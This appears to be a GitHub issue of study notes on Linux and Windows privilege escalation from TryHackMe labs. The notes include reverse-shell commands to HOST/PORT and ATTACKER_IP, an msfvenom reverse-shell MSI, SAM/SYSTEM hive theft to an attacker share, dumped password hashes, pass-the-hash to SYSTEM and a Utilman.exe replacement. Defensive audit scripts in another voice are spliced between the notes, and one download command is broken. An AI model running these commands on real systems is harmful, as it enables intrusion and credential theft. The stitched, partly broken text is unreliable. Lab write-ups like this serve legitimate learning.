Open WDavid404 opened 9 months ago
cat /etc/crontab
Note: a schedule of "* * * * *" means the job will run every minute.
crontab -l: list the cron jobs for the current user
ls -lah /etc/cron*
The following scenario is not uncommon in companies that do not have a certain cyber security maturity level:
1. System administrators need to run a script at regular intervals.
2. They create a cron job to do this.
3. After a while, the script becomes useless, and they delete it.
4. They do not clean up the relevant cron job.
Note: If the full path of the script is not defined (as it was done for the backup.sh script), cron will refer to the paths listed under the PATH variable in the /etc/crontab file.
Example:
You can see the backup.sh script was configured to run every minute.
We can edit backup.sh as below to start a reverse shell:
#! /bin/bash
bash -i >& /dev/tcp/HOST/PORT 0>&1
chmod +x backup.sh
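A defender-side check for the scenario above, written as an added example (it is not the page's own code): it parses a constructed /etc/crontab, resolves bare script names through the crontab's own PATH line the way cron does, and flags jobs whose target is missing, reachable through a world-writable PATH directory, or world-writable itself. The sample crontab and the filesystem snapshot are constructed, and the exists/mode hooks are an assumption of this example so the audit can run against a snapshot as well as a live host.

```python
import os
SAMPLE_CRONTAB = """PATH=/home/user:/usr/local/bin:/usr/bin:/bin
* * * * * root backup.sh
* * * * * root /usr/local/bin/rotate-logs.sh
* * * * * root /opt/scripts/cleanup.sh
"""  # constructed sample /etc/crontab for this audit; not taken from a real host

# Constructed snapshot (path -> st_mode) of what exists on that sample host.
SNAPSHOT = {"/home/user": 0o40777,                     # world-writable dir, first on PATH
            "/usr/local/bin": 0o40755, "/usr/bin": 0o40755, "/bin": 0o40755,
            "/usr/local/bin/rotate-logs.sh": 0o100777}  # the script itself is world-writable

def parse_crontab(text):
    """Return (path_dirs, jobs); each job is (schedule, user, command)."""
    path_dirs, jobs = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line[0].isalpha() and "=" in line:        # NAME=value line such as PATH=
            key, _, value = line.partition("=")
            if key.strip() == "PATH":
                path_dirs = value.strip().strip('"').split(":")
            continue
        fields = line.split(None, 6)                 # 5 schedule fields, user, command
        if len(fields) == 7:
            jobs.append((" ".join(fields[:5]), fields[5], fields[6]))
    return path_dirs, jobs

def audit(text, exists=os.path.exists, mode=lambda p: os.stat(p).st_mode):
    """Return (command, reason) pairs; exists/mode are injectable to audit a snapshot."""
    path_dirs, jobs = parse_crontab(text)
    findings = []
    for _schedule, user, command in jobs:
        exe = command.split()[0]
        # a bare name is resolved through the crontab's PATH line, directory by directory
        candidates = [exe] if os.path.isabs(exe) else [os.path.join(d, exe) for d in path_dirs]
        target = next((c for c in candidates if exists(c)), None)
        if target is None:
            findings.append((command, f"target missing; whoever recreates it runs as {user}"))
        elif mode(target) & 0o002:
            findings.append((command, f"{target} is world-writable"))
        if not os.path.isabs(exe):                   # dirs searched before the hit are hijack points
            tried = candidates if target is None else candidates[:candidates.index(target)]
            for d in map(os.path.dirname, tried):
                if exists(d) and mode(d) & 0o002:
                    findings.append((command, f"{d} is world-writable and searched first on cron PATH"))
    return findings
def audit_snapshot():
    return audit(SAMPLE_CRONTAB, exists=SNAPSHOT.__contains__, mode=SNAPSHOT.__getitem__)
```

Calling audit(open("/etc/crontab").read()) with the default hooks runs the same checks against the live system.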
For demo purposes, we will use the script below:
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    /* Switch to uid/gid 0; this only succeeds when the binary runs SUID root */
    setuid(0);
    setgid(0);
    /* "thm" is looked up through PATH, so whichever directory in PATH holds a "thm" first decides what runs */
    system("thm");
    return 0;
}
This program tries to launch a system binary called "thm", but the example can easily be replicated with any binary.
After 'chmod u+s', our user now has access to the "path" binary with the SUID bit set.
Find writable folders: find / -writable 2>/dev/null | cut -d "/" -f 2,3 | sort -u
Prepend /tmp to PATH: export PATH=/tmp:$PATH
Create a 'thm' file in /tmp that calls /bin/bash.
NFS (Network File Sharing) configuration is kept in the /etc/exports file. This file is created during the NFS server installation and can usually be read by users.
Unattended Windows Installations
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
PowerShell History
In a cmd prompt:
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Saved Windows Credentials
cmdkey /list: list saved credentials.
Then you can use the saved credentials with runas:
runas /savecred /user:{username} cmd.exe
IIS Configuration
Retrieve Credentials from Software: PuTTY
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials.
schtasks /query /tn vulntask /fo list /v: list the task's details.
C:\> schtasks /query /tn vulntask /fo list /v
Folder: \
HostName: THM-PC1
TaskName: \vulntask
Task To Run: C:\tasks\schtask.bat
Run As User: taskusr1
If our current user can modify or overwrite the "Task to Run" executable, we can control what gets executed by the taskusr1 user, resulting in a simple privilege escalation. To check the file permissions on the executable, we use icacls:
C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
As can be seen in the result, the BUILTIN\Users group has full access (F) over the task's binary. This means we can modify the .bat file and insert any payload we like.
Then:
C:\> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
Run the task, and you will receive the reverse shell with taskusr1 privileges as expected:
C:\> schtasks /run /tn vulntask
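As an added example (not the page's own code), a parser for icacls output that automates the permission check above: it recovers each object's path from the alignment of the continuation lines, expands each ACE into its rights, and reports files where a low-privilege principal (Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE) holds an allow ACE carrying F, M, W or a specific write right; deny ACEs are excluded. The icacls output below is constructed: the first object is the page's schtask.bat, the second is a hardened copy with a space in its path.

```python
import re
# Constructed icacls output: the page's task binary beside a hardened copy whose
# path contains a space (icacls aligns continuation lines under the first ACE).
ICACLS_SAMPLE = r"""c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
                     BUILTIN\Administrators:(I)(F)
                     BUILTIN\Users:(I)(F)

Successfully processed 1 files; Failed processing 0 files

C:\tasks\fixed task.bat NT AUTHORITY\SYSTEM:(I)(F)
                        BUILTIN\Administrators:(I)(F)
                        BUILTIN\Users:(I)(RX)
                        Everyone:(DENY)(W)
"""
# Principals every local user belongs to; an allow ACE with write rights for them is a finding.
LOW_PRIV = {"everyone", r"builtin\users", "users", "authenticated users",
            r"nt authority\authenticated users", r"nt authority\interactive"}
# icacls simple rights (F, M, W) and specific rights that let a user change the file or its ACL.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP", "DENY"}

def parse_icacls(text):
    """Return [(path, principal, rights, is_deny)] for every ACE in icacls output."""
    aces, block = [], []
    def flush():
        if block:
            first = block[0]
            # continuation lines are padded to the path's width (fallback: single-ACE object without spaces)
            width = len(block[1]) - len(block[1].lstrip()) if len(block) > 1 else first.index(" ") + 1
            path = first[:width].rstrip()
            for ace in [first[width:]] + [l.strip() for l in block[1:]]:
                who, _, flags = ace.partition(":")
                parts = re.findall(r"\(([^)]*)\)", flags)        # e.g. ["I", "F"] or ["DENY", "W"]
                rights = {r for p in parts for r in p.split(",")} - INHERIT_FLAGS
                aces.append((path, who, rights, "DENY" in parts))
            block.clear()
    for line in text.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            flush()
            continue
        if not line[0].isspace():                 # a new object starts an unindented line
            flush()
        block.append(line)
    flush()
    return aces

def writable_by_low_priv(text):
    """Paths where a low-privilege principal holds an allow ACE with write-capable rights."""
    return sorted({path for path, who, rights, deny in parse_icacls(text)
                   if not deny and who.lower() in LOW_PRIV and rights & WRITE_RIGHTS})
```

Feed it the output of icacls over the "Task To Run" paths from schtasks to find tasks whose binaries ordinary users can rewrite.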
Windows installer files (also known as .msi files) can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges. This method requires two registry values to be set. You can query these from the command line using the commands below.
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If this value is enabled (set to 1), .msi files always run with SYSTEM privileges, so it can be abused for privilege escalation. If it is not needed, set it to 0 in the Registry Editor.
Generate a malicious .msi file using msfvenom, as seen below:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.199.87 LPORT=LOCAL_PORT -f msi -o malicious.msi
Run it:
C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
Windows services are managed by the Service Control Manager (SCM).
sc qc <service name>: check the service configuration
icacls <service path, e.g. C:\PROGRA~2\SYSTEM~1\WService.exe>: check the permissions on the service binary
All of the services configurations are stored on the registry under HKLM\SYSTEM\CurrentControlSet\Services\:
To restart a service (e.g. windowsscheduler):
sc stop windowsscheduler
sc start windowsscheduler
To grant full permissions to the Everyone group:
icacls WService.exe /grant Everyone:F
C:\> sc qc "disk sorter enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: disk sorter enterprise
...
BINARY_PATH_NAME : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
...
Because the path is unquoted and contains spaces, the system has the following three interpretations:
1. C:\MyPrograms\Disk.exe with arguments "Sorter" and "Enterprise\bin\disksrs.exe"
2. C:\MyPrograms\Disk Sorter.exe with argument "Enterprise\bin\disksrs.exe"
3. C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
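The interpretation order above, worked as an added example (not the page's code): search_order() reproduces the candidates Windows tries for an unquoted path, dirs_to_lock_down() lists the directories a defender must confirm are not writable by ordinary users, and quoted_fix() produces the quoted binPath value that removes the ambiguity. It generalises the page's single case to paths that also carry arguments; the sample values are constructed, the first one mirroring the sc qc output shown above.

```python
import ntpath

# Constructed BINARY_PATH_NAME / ImagePath values; the first mirrors the page's sc qc output.
SAMPLES = {
    "disk sorter enterprise": r"C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe",
    "svc-with-args": r"C:\Program Files\Vendor App\svc.exe -k netsvcs",
    "quoted-ok": r'"C:\Program Files\Vendor App\svc.exe" -k netsvcs',
    "no-spaces": r"C:\Windows\system32\svchost.exe -k netsvcs",
}

def split_image_path(image_path):
    """Return (exe, args, quoted); for an unquoted value the exe ends at the first token ending in .exe."""
    p = image_path.strip()
    if p.startswith('"'):
        end = p.index('"', 1)
        return p[1:end], p[end + 1:].strip(), True
    tokens = p.split(" ")
    n = next((i + 1 for i, t in enumerate(tokens) if t.lower().endswith(".exe")), len(tokens))
    return " ".join(tokens[:n]), " ".join(tokens[n:]), False

def search_order(image_path):
    """Executables the service controller would try, in order, for an unquoted path with
    spaces: every token boundary before the real .exe becomes a candidate with .exe appended."""
    exe, _, quoted = split_image_path(image_path)
    if quoted or " " not in exe:
        return [exe]
    tokens = exe.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))] + [exe]

def dirs_to_lock_down(image_path):
    """Directories a planted file would be loaded from ahead of the real binary; confirm
    with icacls that ordinary users cannot create files in any of them."""
    return sorted({ntpath.dirname(c) for c in search_order(image_path)[:-1]})

def quoted_fix(image_path):
    """The binPath value with the executable quoted so the path is unambiguous."""
    exe, args, _ = split_image_path(image_path)
    return f'"{exe}"' + (f" {args}" if args else "")
```

The value from quoted_fix() is what goes into sc config <service> binPath= (on the cmd line the inner quotes have to be escaped as \").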
accesschk64.exe -qlc thmservice
Change the service's binPath, then restart it:
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc stop THMService
sc start THMService
whoami /priv (run as administrator)
The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.
C:\> reg save hklm\system C:\Users\THMBackup\system.hive
C:\> reg save hklm\sam C:\Users\THMBackup\sam.hive
mkdir share
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
C:\> copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
C:\> copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\
user@attackerpc$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Use the Administrator's hash to perform a Pass-the-Hash attack and gain access to the target machine with SYSTEM privileges:
python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@10.10.117.69
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.175.90.....
[*] Found writable share ADMIN$
[*] Uploading file nfhtabqO.exe
[*] Opening SVCManager on 10.10.175.90.....
[*] Creating service RoLE on 10.10.175.90.....
[*] Starting service RoLE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
### SeTakeOwnership
The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges.
Example:
We'll abuse utilman.exe to escalate privileges this time. Utilman is a built-in Windows application used to provide Ease of Access options during the lock screen.
Since Utilman is run with SYSTEM privileges, we will effectively gain SYSTEM privileges if we replace the original binary with any payload we like.
1. Take ownership of it with the following command:
C:\> takeown /f C:\Windows\System32\Utilman.exe
SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WINPRIVESC2\thmtakeownership".
2. Give your user full permissions over utilman.exe:
`icacls C:\Windows\System32\Utilman.exe /grant <user name>:F`
3. Replace utilman.exe with a copy of cmd.exe:
`C:\Windows\System32\> copy cmd.exe utilman.exe`
### SeImpersonate / SeAssignPrimaryToken
These privileges allow a process to impersonate other users and act on their behalf.
wmic tool:
wmic product get name,version,vendor
Note: wmic product command may not return all installed programs. Depending on how some of the programs were installed, they might not get listed here. It is always worth checking desktop shortcuts, available services or generally any trace that indicates the existence of additional software that might be vulnerable.
Online info:
https://www.exploit-db.com/
https://packetstormsecurity.com/
Case Study: Druva inSync 6.6.3
PayloadsAllTheThings - Windows Privilege Escalation
Priv2Admin - Abusing Windows Privileges
RogueWinRM Exploit
Potatoes
Decoder's Blog
Token Kidnapping
Hacktricks - Windows Local Privilege Escalation
Linux Privilege Escalation
Enumeration
hostname
cat /proc/version (also shows the gcc version)
cat /etc/issue
cat /etc/os-release
uname -a
ps -A: view all running processes
ps axjf: view the process tree
env
sudo -l
ip route : command to see which network routes exist.
ls
id
cat /etc/passwd
history
ifconfig
routel
ss -anp
ss -tlpn
cat /etc/crontab
cat /etc/iptables/rules.v4
ls -lah /etc/cron*
crontab -l
sudo crontab -l
grep "CRON" /var/log/syslog (see https://github.com/WDavid404/Note_tryhackme/issues/2#issuecomment-1767980521)
dpkg -l: list applications installed by dpkg
find / -writable -type d 2>/dev/null
cat /etc/fstab: lists all drives that will be mounted at boot time.
mount
lsblk: to view all available disks.
lsmod: enumerate the loaded kernel modules
/sbin/modinfo libata: Displaying additional information about a module 'libata'
netcat
find Command
Automated Enumeration Tools
Privilege Escalation: Kernel Exploits
On the target machine:
$ cd /tmp/
$ wget:9000/ofs
$ chmod +x ofs
$ ./ofs
User xxxx may run the following commands on XXX-M-XHXHK987AW: (ALL) ALL
openssl passwd -1 -salt xxxxxxxx password
$1$xxxxxxxx$UYCIxa628.9qXjpQCjM4a.
getcap -r / 2>/dev/null
-r: enables recursive search.
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/dumpcap cap_net_admin,cap_net_raw=eip
/usr/bin/fping cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
From the output above, you can see that the cap_net_raw capability is set on /usr/bin/ping. The ping command uses RAW and PACKET sockets; through the capability mechanism it is granted only the privilege it needs.
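A baseline check built on the getcap output above, added here as an example (not the page's code): parse_getcap() reads both libcap output styles ("path caps=flags" and the older "path = caps+flags") into a map of capability names per binary, and unexpected_caps() reports every binary whose file capabilities go beyond an approved baseline, which is the least-privilege property the text describes for ping. The baseline is the page's four getcap lines; the sample output is constructed and adds one extra capability on dumpcap and one unexpected binary, /opt/agent/collector, to show both kinds of finding.

```python
import re

# Constructed getcap -r output: the page's four lines, one extra capability on dumpcap,
# and one unexpected binary printed in the older "path = caps+flags" style.
GETCAP_SAMPLE = """\
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/dumpcap cap_net_admin,cap_net_raw,cap_dac_read_search=eip
/usr/bin/fping cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/opt/agent/collector = cap_sys_admin+ep
"""

# Approved capability set per binary, taken from the page's getcap output.
BASELINE = {
    "/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper": {"cap_net_bind_service", "cap_net_admin"},
    "/usr/bin/dumpcap": {"cap_net_admin", "cap_net_raw"},
    "/usr/bin/fping": {"cap_net_raw"},
    "/usr/bin/ping": {"cap_net_raw"},
}

CLAUSE_RE = re.compile(r"([a-z0-9_,]+)([=+-])([eip]*)")   # e.g. cap_net_raw=ep or cap_sys_admin+ep

def parse_getcap(text):
    """Return {path: set of capability names} from getcap -r output in either output style."""
    caps = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        path, _, rest = line.strip().partition(" ")
        names = set()
        for group, op, _flags in CLAUSE_RE.findall(rest.lstrip("= ")):
            if op != "-":                        # a "-" clause removes caps; "=" and "+" grant them
                names.update(group.split(","))
        caps[path] = names
    return caps

def unexpected_caps(text, baseline=BASELINE):
    """(path, extra caps) for binaries whose file capabilities exceed the baseline."""
    extras = {p: sorted(c - baseline.get(p, set())) for p, c in parse_getcap(text).items()}
    return sorted((p, e) for p, e in extras.items() if e)
```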